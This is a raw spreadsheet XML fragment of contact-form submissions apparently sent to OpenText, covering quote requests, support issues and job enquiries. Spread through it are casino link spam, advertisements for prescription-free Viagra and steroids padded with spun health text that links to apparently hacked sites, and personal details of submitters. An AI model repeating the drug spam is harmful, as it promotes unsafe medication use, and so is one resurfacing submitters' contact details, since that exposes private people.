We realize you have products and services that are suitable for Cloudera Users, Hortonworks Users and MapR users. We have list of 4,500+ companies for Cloudera Users, Hortonworks Users and MapR users across the globe. _x000D_
_x000D_
We can provide Email list of any key contact from these companies with complete contact information._x000D_
_x000D_
We can provide 98% accurate Email list with 70% Direct numbers too. _x000D_
_x000D_
Let us know of your interest in the Email List above or any other Lists._x000D_
_x000D_
Regards,_x000D_
Julie Almeida _x000D_
</t>
  </si>
  <si>
    <t>We are currently using StreamServe (installed on-premise), but I would like to know if OpenText also has a cloud solution.</t>
  </si>
  <si>
    <t>I am secretary of a Probus Club which is purely a social club.  I keep all the e-mail addresses of members purely to allow me to contact them on club business.  Do I need to abide to any regulation in GDPR?</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playcasinoonline24.com/]cassino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slots online&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t xml:space="preserve">Public_x000D_
_x000D_
Hi._x000D_
_x000D_
Having briefly reviewed your insurance claims capability we are interested in inviting your team to tender for the opportunity to help automate some of our household claims operation. _x000D_
_x000D_
If you are interested please can you drop me a line or give me a call to discuss._x000D_
_x000D_
There is only so much we can obtain from  your website though we were initially impressed by the solution you have to offer._x000D_
_x000D_
Look forward to hearing from you_x000D_
_x000D_
Graeme._x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
vor einigen Jahren haben wir von der msg systems ag in München eine Software in Gupta/SQL-Base entwickeln lassen. Leider bietet uns die msg systems ag in München nun keinen Support mehr an. _x000D_
Aus diesem Grund wende ich mich nun an Sie, könnten Sie uns einen entsprechenden Entwicklungspartner nennen, mit dem wir unsere neuen Anforderungen an die Software besprechen könnten?_x000D_
Viele Grüße &amp; danke für Ihre Rückmeldung,_x000D_
Christian Maucher</t>
  </si>
  <si>
    <t>Application Status Enquiry - Senior Solutions Consultant - NSW - AUS_x000D_
_x000D_
To the recruitment officer, I’m following up on the status of a recent job application for a Sydney based opportunity to join the team as a Senior Solutions Consultant._x000D_
Would it be possible to enquire and understand the status of my application with an indicative timeframe._x000D_
If the application requires further clarification, i am available to discuss and provide more information._x000D_
_x000D_
Much appreciated Bruno</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Support-Team, _x000D_
_x000D_
we would like to use the DWG Viewer. _x000D_
Could you send us a download link? _x000D_
_x000D_
Kind regards,_x000D_
Florian Moraru </t>
  </si>
  <si>
    <t>Дело не в ветроустойчивости (производители не ограничивают очень допустимую скорость ветра): яхсменам-парусникам и так понятно, что ветру порвать полотнище бермудского паруса фактически нереально &lt;a href="http://www.sibear.ru/information/sortovoj-prokat-sfery-primenenija-i-osnovnye.htm"&gt;сцылко&lt;/a&gt;.</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;cassino&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
Could you please check if we have a customer support contract? When I try to check my ticket that Markus Anding registered in my name, OTCS Ticket 3740993, I just get in a loop confirming my mail address but I can not get any further._x000D_
_x000D_
Kind regards,_x000D_
/Fia_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I was wondering._x000D_
The single seat licence for bravereader, is this a lifetime licence?_x000D_
This is unclear on your website.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Dans le cadre d'un projet de portail documentaire, je dois choisir entre différentes solutions. Pour cela je voudrais savoir s'il était possible de tester Opentext et/ou avoir une liste précise des fonctionnalités de votre EIM._x000D_
_x000D_
En vous remerciant.</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://playcasinoonline24.com/]online casino slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casinos online&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>RFQ: Hummingbird license QTY 25 licenses</t>
  </si>
  <si>
    <t xml:space="preserve">hi, i am looking for more details on opentext and application xtender. i believe we already have both in our business and we want to know more about the config and how we can get PDF's sent to us via email converted to XML and sent to the cloud.   </t>
  </si>
  <si>
    <t>Hi there,_x000D_
I've been having a problem since last two weeks, not being able to buy licenses from your portal. and trying to get the help of your technical support and sales support but they just point to each other and don't resolve the issue. I am seriously tired of all these. I have never experienced such a worst service as you got. _x000D_
Your customer service is the worst of the worsts._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Can you please send me the license agreement for your "OpenText Exceed" software. I'm evaluating X-windows clients for a client and I can't find the license agreement online._x000D_
Thanks,_x000D_
Rob</t>
  </si>
  <si>
    <t>I have some users with Brava Desktop installed on their computers. One scenario is, a user received a new computer, how can I transfer the license file to the new computer?</t>
  </si>
  <si>
    <t>Uso o Free DWG Viewer a algum tempo e derrepente parou de funcionar  exibindo a seguinte menssagem._x000D_
Invalid license._x000D_
Unable to load files._x000D_
_x000D_
An update is required for Brava! FreeDWG Viewer._x000D_
Please contact your supplier for an update._x000D_
_x000D_
Por favor como resolver este problema.</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting a quote for (Quantity-4) InputAccel scanplus modules, (Quantity-4)  InputAccel attended client, (Quantity-1)  InputAccel standard server 1M PPY, (Quantity-1) EMC Application xtender export, and (Quantity-1) support agreement for 1 year.   Term 7/1/2018 - 6/30/2019.  Thank you.   </t>
  </si>
  <si>
    <t>I can teik a Nclex tes_x000D_
In San Juan Puerto Rico     USA</t>
  </si>
  <si>
    <t xml:space="preserve">Our office has been trying to get a hold of the sales rep who help us on our faxpress fax system. Spoke with your support team a gave a name, Saeed, who is our sales rep. Left numerous messages to get back to us concerning our account. The doctor decided to cancel the account as of may 1st. We have been having so many problems with your system. Please contact as soon as possible. Thank you.  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Edward Martin and I work with The List Box. It struck me that you might be interested in investing in Legal marketing database, and was hoping you could spare me few minutes. My company is in the business of “facilitating communication” with legal professionals. That is, we can help you to connect with Legal CIO, Legal Marketing, Legal Diversity &amp; Talent Management Forum, Business of Law Forum and Legal tech, Legal Advisor, Paralegals, Lawyers and law firms, General Counsel , Deputy General Counsel , Associate General Counsel , Senior Counsel, Corporate, Counsel, Legal Counsel, Chief Legal Officer, Vice President, Legal, Director of Legal, Legal Director, Director of Legal Affairs, Legal Affairs Officer, Chief Compliance Officer, Vice President, Compliance, Compliance Officer, Compliance Manager and other decision makers from various industries. _x000D_
_x000D_
Do contact me if you would like to know more about our data._x000D_
_x000D_
Also, my apologies, if you are not the right person to reach out to. Could you direct me to the right person to talk about this in detail?_x000D_
_x000D_
Thanks and Regards,_x000D_
Edward Martin</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in the OpenText Captiva PixTools Toolkit. Can you utilize the toolkit for custom C# Windows Applications utilizing the ISIS interface for scanning? If so, then I would please like a quote to purchase the OpenText Captiva PixTools Toolkit. </t>
  </si>
  <si>
    <t>Is OpenText Enterprise Connect Framework compatible with Windows Server 2016 and Citrix7.x?</t>
  </si>
  <si>
    <t>My name is Kyle Stanzel and I am attempting to verify employment of a former employee at TPN Register, which was acquired by GXS, Inc. in 2001, which was subsequently acquired by OpenText in 2014. If you could assist me in A) determining if employment records for TPN Register are still maintained by OpenText and B) verifying the former employee's dates of employment and official job title, it would be greatly appreciated._x000D_
_x000D_
Thank you,_x000D_
Kyle Stanzel</t>
  </si>
  <si>
    <t xml:space="preserve">Looking in to a notication system </t>
  </si>
  <si>
    <t>I am still getting billed on my American Express Card,  last five digits are 12004 (new card changed that to 13002).  Last charge was $3.56.  I believe this is from my fax2email service but I no longer work at Ameriprise  and need to stop this.  Thanks.</t>
  </si>
  <si>
    <t>We are currently using Captaris FaxPress 6.1, and I am tasked to upgrade the software.</t>
  </si>
  <si>
    <t>Hi _x000D_
_x000D_
We have a kit opportunity for Hutchinson 3G in the UK and would like to know who we would be able to get pricing from. Please would you be able to confirm whether you have any distributors._x000D_
_x000D_
Please let me know if you require any further details._x000D_
_x000D_
Many Thanks_x000D_
_x000D_
Paul Banks</t>
  </si>
  <si>
    <t>I would like to obtain a quotation to revise an EDI map.</t>
  </si>
  <si>
    <t>Need external faxing solution for 4 or so employees to send a total of 1000 pages a month outbound.  Want to learn about system requirements and how your service works.</t>
  </si>
  <si>
    <t>I work for a congresswoman who is retiring at the end of this term. Her records will be donated to a local archive. I am in charge of getting her papers ready for donation. I am looking for a software that will batch convert various files into pdf and pdf/a. These files need to be text searchable. Also, I noticed you have redaction software and would be interested in learning about that as well as lot of the documents contain PII.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
My name is Claudia Ndjou’ou, I am a full time student at Carleton university currently studying Political Science. To add, I am also the owner and marketer for Bamboo works Marketing. The reason why I’m contacting your company is because I wanted to know if there’s any summer student position open for this upcoming summer 2018 in Ottawa. _x000D_
_x000D_
Best,_x000D_
Claudia </t>
  </si>
  <si>
    <t>Dear OpenText, _x000D_
We are looking to invite OpenText for an RFP for Document Management solution for Lumeris. Please let us know who is the best sales person to contact. _x000D_
_x000D_
Thank you_x000D_
Hareesh</t>
  </si>
  <si>
    <t>We have a new RFQ to be released shortly for the Document Compressing Solution and would like you to provide us with the contact details of your sales team, in order to forward you the official RFQ invitation at the earliest.</t>
  </si>
  <si>
    <t>We purchased a product called TX a few weeks ago to replace our free Brava Reader we use daily at our office. The install instructions we received are not clear. Please email step by step instructions so we may take advantage of our purchase of the software. Thanks.</t>
  </si>
  <si>
    <t>Betr.: HR und/oder Marketing_x000D_
_x000D_
Sehr geehrte Damen und Herren,_x000D_
viele Jahre war ich Administrator und Kundenbetreuer von Ihren Applikationen LiveLink und Documentum/D2. Da ich momentan arbeitssuchend bin, wäre ich daran interessiert, mein Knowhow in eine neue Firma weiter zu tragen. So suche ich in der Schweiz am Platz Basel und Umgebung einen neuen Arbeitgeber. Bedauerlicher Weise sind nur Stelleninserate zu Ihrem Mitbewerber (MS SharePoint) ausgeschrieben. Deswegen möchte ich Sie bitten, mir eine Liste Ihrer Kunden am Platz Basel und Umgebung zu kommen zu lassen, um mich gezielt bewerben zu können._x000D_
_x000D_
Vielen Dank für Ihre Unterstützung!_x000D_
_x000D_
Mit freundlichen Grüssen,_x000D_
Armin Schulze_x000D_
Schopfheim, Lindenweg 36</t>
  </si>
  <si>
    <t>We own 100 licenses of v14.  We are need to upgrade these to v15 so they can be windows 10 compatible.  Can we get a price for upgrade these?  Last PO# was  PO 1002374 directly through you.  Also, it's better to email me then call me as i'm not always at my desk.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Notre société de moins de 100 salariés souhaiterait investir dans un nouvel outil de reporting.  _x000D_
Ce nouvel outil concernerait le service financier, RH et opérationnel. _x000D_
_x000D_
A l'heure actuelle, nous sommes 2 contrôleurs de gestion et réalisons une dizaine de tableaux de bord mensuellement destinés à 5 décideurs._x000D_
Le but serait d'automatiser le reporting et de fiabiliser les données afin de considérablement réduire la durée de cloture._x000D_
_x000D_
Nous souhaiterions de ce fait, recevoir de plus amples informations sur votre solution CGI Powertools._x000D_
_x000D_
Merci d'avance pour votre réponse,_x000D_
_x000D_
Jacques Caron</t>
  </si>
  <si>
    <t>I have a client who is looking to convert unstructured documents that contain maintenance tasks into structured documents that can be loaded into SAP PM.  "A tool to scan, capture, deconstruct, group, validate, workflow and output as a text file all the maintenance instruction related data and data elements"_x000D_
Does your suite of software offer this type of solution?</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;play casino games online&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino slots&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>Hi, we are looking for a DMS solution and found documentum meets expectation. Can you please send us a license quotation for same for 5000 users._x000D_
_x000D_
Regards_x000D_
Devender</t>
  </si>
  <si>
    <t>TO get knowledge base access</t>
  </si>
  <si>
    <t>seeking job,give education,service-or one of three</t>
  </si>
  <si>
    <t>[url=http://www.saitek.it/images/biller/cotta.php?layout=983-Sildenafil-Citrate-Manufacturers-In-Hyderabad,Stanozolol-Side-Effects,Testosterone-Enanthate-Suppliers-Uk]Sildenafil Citrate Manufacturers In Hyderabad[/url]_x000D_
 Add more shade, structure, and pop to a region or mother nature-inspired marriage ceremony or wedding reception concept with old-fashioned and vintage boxes and furnishings. Enamel planting pots, watering cans, and tin washtubs are fantastic for presenting wedding ceremony courses, favors, or butter mints. Cleansed, colored jelly jars and terracotta flowerpots make attractive, captivating holders for scented tea lighting fixtures and votive candle lights._x000D_
  [url=http://www.terrabrasiluniformes.com.br/ocushio/install.php?hacked=1114]Steroid Suppliers In Mumbai[/url]_x000D_
 If your child need to take a servicing prescription medication each and every day, you should always check the drug store tag and directions, with picking up every re-fill. It is far from rare for medical doctors or nurses to enhance or change the doses as your child's grow older and excess weight increase. Reviewing the directions during the time you decide on within the medication is the best option and can save your kid from health risks._x000D_
  [url=http://www.snehbandhan.net/css/power.asp?lot=239-Viagra-100mg-Prijs,Kamagra-100mg-Oral-Jelly-Werking,Viagra-Generisch]Viagra 100mg Prijs[/url]_x000D_
 Make use of your youngsters like a stimulating consider stop smoking, and undertake it now. Stats reveal that moms and dads who smoke cigarettes are more inclined to get children who smoke cigarettes. Not only will this possibly be considered a long-term behavior which can cause them significant health issues, nonetheless they can also get rid of a way of measuring respect for yourself as someone who could not management their very own conduct._x000D_
  [url=http://www.dmgeventspecialist.com/librarie1s/send.php?put=42-Anavar-Oxandrolone-25mg,Testosterone-Cypionate-Sale-Online,Testosterone-Undecanoate-Hal</t>
  </si>
  <si>
    <t>Hi Sir, _x000D_
_x000D_
I am looking for internship job opportunities at your firm. I request you to please let me know if any opportunity is available and provide me with the relevant information. _x000D_
_x000D_
Currently, I am a student at the University of Waterloo pursuing a bachelor’s degree in mathematics. _x000D_
_x000D_
Thanking you_x000D_
Sarthak Chawla</t>
  </si>
  <si>
    <t>PHD student is looking to use OpenText for his thesis. Can you send me information on cost or send through a quote to the above email address. Or a link to costs as I cannot find it online. Thanks</t>
  </si>
  <si>
    <t>I have old medical and some personal data stored on three CDroms using Captaris Alchemy which I cannot now access having switched from PC to Mac. I am now retired and it is not absolutely essential to be able to access this data currently but I would like to be able to do so in case a need arises. Is there any software that I can download for my Mac which would allow this in the future. The medical data is no 2 discs and the personal on one. Because it is not critical I do not want to spend a large sum on this. Can you help please?</t>
  </si>
  <si>
    <t>Please send a quotation for 22 users. they are a law firm.</t>
  </si>
  <si>
    <t>We have been searching for our latest invoice for support but the last one we found was for January 1 2017.  The business has been moved to Chicago and has a new W9.  I need to get this invoiced and contact information changed as we continue to use the GSX product.</t>
  </si>
  <si>
    <t>Please send confirmation of Support contract for NYS Office of Information Technology.  License key is NY TAX V8 Prod (7BE27) PERM_20140721.  I have replaced the position of Missy Geis and have been having difficulty accessing the account Support.</t>
  </si>
  <si>
    <t xml:space="preserve">Interest in Right Fax integrations. </t>
  </si>
  <si>
    <t>Looking into RightFax Appliance Solutions</t>
  </si>
  <si>
    <t>We are reaching out for RFP opportunity for the following: Illumina is in need of an Electronic Document Management System that can manage our library of all facilities record drawings consisting of each floorplan and by discipline (architectural, MEP, civil, structural, etc). Manage workflow and catalog documents.  Can someone reach beck to us with a name, email and phone number to see if this is an RFP of interest to participate in.  Thank you!</t>
  </si>
  <si>
    <t>Hello, I'm interested in learning more about the Exstream product and how it can help with variable data print and email workflows.</t>
  </si>
  <si>
    <t>[url=http://wp.bsinetworks.net/?p=3917]Purchase[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I was glad to know you are already partnering with us for document management and I would like to know the possibility to talk to you about centralizing our auditing department that needs helps with dashboard, templates, automation, MS office integration, etc. is this something you can help me with?_x000D_
</t>
  </si>
  <si>
    <t>I am suddenly denied access to my OpenText support account.  I need to enter a technical support ticket but am unable to do so.</t>
  </si>
  <si>
    <t xml:space="preserve">Boa tarde,_x000D_
_x000D_
Preciso fazer um cadastro no EDI para a Cia Zaffari e não sei como fazer._x000D_
código		_x000D_
47627707_x000D_
DUN14/DE	_x000D_
1.789586499397.7_x000D_
EAN13/PARA	_x000D_
7895864993970_x000D_
</t>
  </si>
  <si>
    <t>Hello - I am looking for a web-based faxing solution that can handle a large amount of volume. This is something we're looking to implement as soon as possible, please reach me via email and thank you.</t>
  </si>
  <si>
    <t>I request your support for the payment of the service invoice issued to GXS._x000D_
Lic. Alexandra Murari and Marcelo Amaral in Brazil refuse to make the corresponding payment._x000D_
Please refer me to the corresponding area that can give solution to this situation.</t>
  </si>
  <si>
    <t>Email Address change</t>
  </si>
  <si>
    <t>My company has been a long-time user of the Exceed X Window emulator, back to version 5 or 6 when it was still owned by Hummingbird.  We are currently running Opentext Exceed Version 15._x000D_
_x000D_
I am looking for information about the roadmap for this application.  Will there be an Exceed Version 16, or is this application being retired in favor of another product?  Do we need to start planning for a transition to Turbo Exceed X?</t>
  </si>
  <si>
    <t>I'm trying to download the latest version of RightFax which we originally acquired through our Ricoh representative several years ago.  We have found that the version we are running does not work with Windows 10 and would like to upgrade (along with having a few tech questions about the upgrade answered).  After speaking to Ricoh, we were told to come here to get the download, so any help you can provide is greatly appreciated.  Thanks!</t>
  </si>
  <si>
    <t>We currently have a RightFax server here in our office. And we would like to investigate moving to your cloud version.</t>
  </si>
  <si>
    <t>Requesting quote for OpenText RightFax Express Appliance - 8 channel model</t>
  </si>
  <si>
    <t>Sending out an RFI and need a contact to release it to from Open Text.</t>
  </si>
  <si>
    <t>Sales query.</t>
  </si>
  <si>
    <t xml:space="preserve">We are an Angolan company who has worked for some years with documentary management and ECM.  We are very interested in your software so I want to know what your sales and pricing policies._x000D_
_x000D_
With My Best regards _x000D_
_x000D_
Pedro </t>
  </si>
  <si>
    <t>VIM By OpenText compatibility with current SAP version: _x000D_
Interested by OpenText solution in order to better manage our procurement process, here are my questions, and I believe this is crucial for us to decide to buy the product or not:_x000D_
- Is it compatible with SAP ECC6 EHP4 version ?_x000D_
- Our company headquarter NLMK Group in Liptsk already bought VIM but they are running different SAP version which is SAP S4HANA 1610. The question here is can we as NLMK Europe use these licenses for free ?_x000D_
- Any idea about the VIM byOpenText cost of licenses by user?_x000D_
Thanks you</t>
  </si>
  <si>
    <t>Want to know how to run a silent install of the application to install using a batch file.</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://playcasinoonline24.com/]best online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
slots online</t>
  </si>
  <si>
    <t>OpenText Brava for Desktop quote for 20 licenses.</t>
  </si>
  <si>
    <t>Product purchased on Friday 27/04, I still haven't received any download instructions, please advise</t>
  </si>
  <si>
    <t>Account manager contact details. We used to have a contact of Juliet Whitson. Who is her replacement?_x000D_
jwhitson@opentext.com</t>
  </si>
  <si>
    <t>Hi there_x000D_
_x000D_
I have gone through a lot of times trying to get my key activated but the same same thing came up even though i have verified my email many times. I could get to my support page but when i clicked on the activations/key icon it just comes up with "We're sorry, your account does not grant you access to this resource". Could you please help as I really need to get this key activated to be able to do my work_x000D_
_x000D_
Many thanks_x000D_
_x000D_
Margaret</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://playcasinoonline24.com/]casinos online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino games&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://playcasinoonline24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>1) Need to install OpenText Web Experience Manager. So, I need a reference document for installation._x000D_
2) Also, need to know whether it requires any license. If a license is required, please provide a cost of it._x000D_
3) Let me know if there any trial version?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://jp.imelfin.com/state/tod.php?66153=22]Hygetropin 10iu[/url]_x000D_
 While shopping all around for the apartment, search for 1 that includes a sprinkler method installed in it. It may cost you a bit more in lease every month with an condo with one of these with them nevertheless it gives you a great discounted on your renter's insurance policy and will help you to keep your valuables in a blaze._x000D_
  [url=http://www.mavielektronik.com.tr/images/crypt.php?sf=167-buy-kigtropin-hgh-online,ansomone-fake,growth-hormone-injections-for-horses/]buy kigtropin hgh online[/url]_x000D_
 Perform some looking into. A lot of people suffer from allergic reactions and never be aware of trigger. The greatest thing that can be done to aid is to try and recognize what is the allergen that is triggering your signs and symptoms. Keep a log of if you are possessing symptoms, to enable you to determine what is the cause of your allergic reactions._x000D_
  [url=http://support.wysiwyg.fr/cache/join.php?real=Testosterone-Acetate-Profile-Testosterone-Cypionate-Sale-Online-Testosterone-Undecanoate-Half-Life-1186/]Testosterone Acetate Profile[/url]_x000D_
 A facelift, Rhytidectomy, visably enhances indications of growing older within the neck area, and face. For instance, if a affected individual has dropped tone of muscle from the deal with. The individuals appears to be if he, or she has jowls. The normal cost of a face lift surgical treatment in the states is a touch around $5,000.00._x000D_
  [url=http://naucni-skup.fpps.edu.rs/media/simple.php?au=526-Drostanolone-Metabolites-For-Sale-Nandrolone-Steroids-Trenbolone-Acetate-Powder-Suppliers.html]Drostanolone Metabolites For Sale[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello and Good Day_x000D_
_x000D_
I am Max,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t>
  </si>
  <si>
    <t>I registered for a course that starts tomorrow (Monday april 30th) last Friday in the early afternoon, 2-0120 OpenText Records Management 16.2, and have not received any instruction or course materials.  Please advise as soon as possible as to how to proceed with this course.  How do I log in etc. and where is course material located.  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team_x000D_
 _x000D_
We have an end user Optus Systems Pty Ltd from Australia wants to procure below license._x000D_
_x000D_
1 X 1000025394 - Exceed Standard Connectivity Single Lic_x000D_
1 X 1000025395 - Exceed (Electronic) Single Lic 1 Year Maintenance_x000D_
_x000D_
Billing will be done from SoftwareONE Australia_x000D_
Deployment: Australia_x000D_
_x000D_
Kindly share the below details on priority._x000D_
1.  Price quote _x000D_
2. Validity for 1 month._x000D_
3. Delivery time._x000D_
4. Payment terms_x000D_
5. Reseller Discount_x000D_
_x000D_
_x000D_
Thankyou!_x000D_
_x000D_
Umang Dubey_x000D_
Senior Procurement Specialist_x000D_
+91 7827515789_x000D_
umang.dubey@softwareone.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">informs_x000D_
 [url=http://viagrawithoutdoctor.org]RSA Anti-Fraud Command Center[/url] hollywood_x000D_
 &lt;a href="http://viagrawithoutdoctor.org"&gt;RSA Anti-Fraud Command Center&lt;/a&gt; lanka_x000D_
 bowlegsfree_x000D_
</t>
  </si>
  <si>
    <t>viagra without a doctor prescription paypal [url=http://viagrawithoutdocpresc.accountant/#9203]viagra without a doctor prescription cvs stores[/url] viagra without insurance</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
We are very pleased to inform you of the 1st International Conference on Smart Cities and Communities, 24-26 July 2018, Ouagadougou, Burkina Faso._x000D_
_x000D_
There will be an exhibition at the conference; for that we offers stands at the rate of 4000 USD per stand. Let us know in case you are interested by a stand._x000D_
_x000D_
Burkina Faso is french speaking country._x000D_
_x000D_
Regard,_x000D_
_x000D_
Guinko Ferdinand</t>
  </si>
  <si>
    <t>I would like to ask if there is an email where I can forward my resume for a job application in your company. Thank you for your time and God Bless.</t>
  </si>
  <si>
    <t>Мой вк radik_y2014   скайп kruzzor _x000D_
 _x000D_
Могу долго расписывать какой я молодец, сколько десятков лет у меня опыта в данной сфере, но я предпочитаю "воде" реальные факты.Поэтому хватит лирики, вот что я могу предложить: _x000D_
------------------------------------ _x000D_
1. Качество услуг на уровне ведущих компаний. _x000D_
--- _x000D_
2. Цены существенно ниже чем в компаниях (зачастую в разы). _x000D_
--- _x000D_
3. Постоянная доступность, готовность ответить на интересующие Вас вопросы (ну разве что не ночью), то есть не нужно писать письма и сутками ждать ответа. _x000D_
--- _x000D_
4. ГОТОВ ПРЕДОСТАВИТЬ ПОРТФОЛИО РЕАЛЬНЫХ РАБОТ. ПРОВЕРИТЬ МОЖНО ПРОСТО ПОЗВОНИВ ПО НОМЕРАМ, УКАЗАННЫМ НА САЙТАХ. _x000D_
--- _x000D_
5. Мой опыт работы в рекламном агентстве позволяет выделить ваш продукт среди конкурентов, что значительно повысит вашу прибыль от сайта в дальнейшем. _x000D_
--- _x000D_
6. Люблю креативить. Это можно увидеть в моих работах. _x000D_
--- _x000D_
7. При желании можно встретиться и побеседовать лично. _x000D_
--- _x000D_
8. Также могу предложить: SEO продвижение сайта, контекстную рекламу Я.Директ и SMM продвижение в социальных сетях _x000D_
--- _x000D_
Я надеюсь, что первоначальной информации достаточно, ЗВОНИТЕ ;) _x000D_
------------------------------------- _x000D_
Сайт-визитка, лендинг, лэндинг, landing page, интернет-магазин, портал, корпоративный сайт.</t>
  </si>
  <si>
    <t xml:space="preserve">hello all_x000D_
i try to connect and to see the partner and the support portal and i cant get it _x000D_
i need to see the same as Tomer.Sharon@ness-tech.co.il and Dganit.Bodek@ness-tech.co.il_x000D_
please help me  </t>
  </si>
  <si>
    <t>we have a email hosting service and we want to deploy a new mail server our users accounts are more than 10000, please provide us a license pricing for around 10 servers.</t>
  </si>
  <si>
    <t>I am a new graduate with bachelor in civil engineering and looking for training or master in highways engineering scholarship</t>
  </si>
  <si>
    <t>Regarding job....</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam_x000D_
Subject: Request for Price Quote_x000D_
This is to bring to your kind attention that we are running an IT company (system integrator). We would be very grateful to you if you could provide us the quotation of the following items on urgent basis. We would be requiring them in the initial state. Please find below the details:_x000D_
_x000D_
***Guidance Software – EnCase eDiscovery; Qty.= 1 pcs_x000D_
***Guidance Software – EnCase Forensic; Qty.= 1 pcs_x000D_
_x000D_
We are also asking if you can give us the best possible price for such goods. Also, could you please send the part number; full description; product's data sheet and any other related technical information of the above mentioned (please specify any included item in details) product to us._x000D_
_x000D_
Yours sincerely,_x000D_
Farnoush Seyed Hosseini_x000D_
Overseas Procurement Coordinator / Administrator_x000D_
Intelligent Data Miners FZE_x000D_
</t>
  </si>
  <si>
    <t>slots online _x000D_
[url=http://playcasinoonline24.com/]kasino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online slots&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>Bonjour_x000D_
Je cherche une formation de 5 jours sur Documentum D2._x000D_
Pouriez vous me renseigner  si c'est possible._x000D_
Merci</t>
  </si>
  <si>
    <t>Архитектурное проектирование объектов различных типов сооружений — это важнейший этап, значительный и ответственный в строительном процессе, подробнее читайте на сайте [url=http://roofor.ru]roofor.ru[/url]</t>
  </si>
  <si>
    <t>Я ваще такова не видел!!!это круто!! &lt;iframe width="560" height="315" src="https://www.youtube.com/embed/8ocBMsN_H3I" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.camiloearmstrong.adv.br/css/file.php?g=180]Buy Clomid Pct[/url]_x000D_
 Exercise. Get into performing some kind of everyday exercise regimen. Go for a walk or possibly a work, sign up for a fitness center, or invest in a workout DVD that you just do each day. This extra exercise releases dopamine and seratonin into your body, improves your mood plus your air degrees. Most of these stuff interact to help keep you healthier, more happy and fewer emphasized._x000D_
  [url=http://www.creativebusinessservices.net/wp-content/slider.php?n=717-Methenolone-Side-Effects-Testosterone-Powder-India-Trenbolone-Cost-Uk/]Methenolone Side Effects[/url]_x000D_
 A vital hint to take into consideration when trying to restoration your credit score is the fact if you are going to get declaring bankruptcy as being a confidence, to get it done as soon as possible. This is important simply because you need to start rebuilding your credit rating as quickly as possible and a decade is a very long time. Tend not to put yourself additional behind than you should be._x000D_
  [url=http://www.grupojarbet.com/wordpress/session.php?swit=298]Buy Trenbolone Enanthate Uk[/url]_x000D_
 Vitamin C is ideal for getting older epidermis. It may help skin to help keep its healthful gleam by combating destroying sunshine sun rays, alcoholic drinks, smoke and also other contaminants that harm the facial skin. Additionally, it have robust anti-oxidant attributes which reduces the appearance of the skin's age spots and helps organization within the pores and skin._x000D_
  [url=http://www.smpn4tangsel.sch.id/asmanabnur/back.php?love=1328]Testosterone Isocaproate Dosage[/url]_x000D_
</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://playcasinoonline24.com/]slots online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;best online casino&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>Trying to get technical support for NFS Maestro</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games slots&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t>online casino gambling _x000D_
[url=http://playcasinoonline24.com/]online casino slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>online casino gambling _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slots online&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, I am looking for job opening in Canada. Please let me know the IT consultancy from which opentext recurting owerseas employee.  </t>
  </si>
  <si>
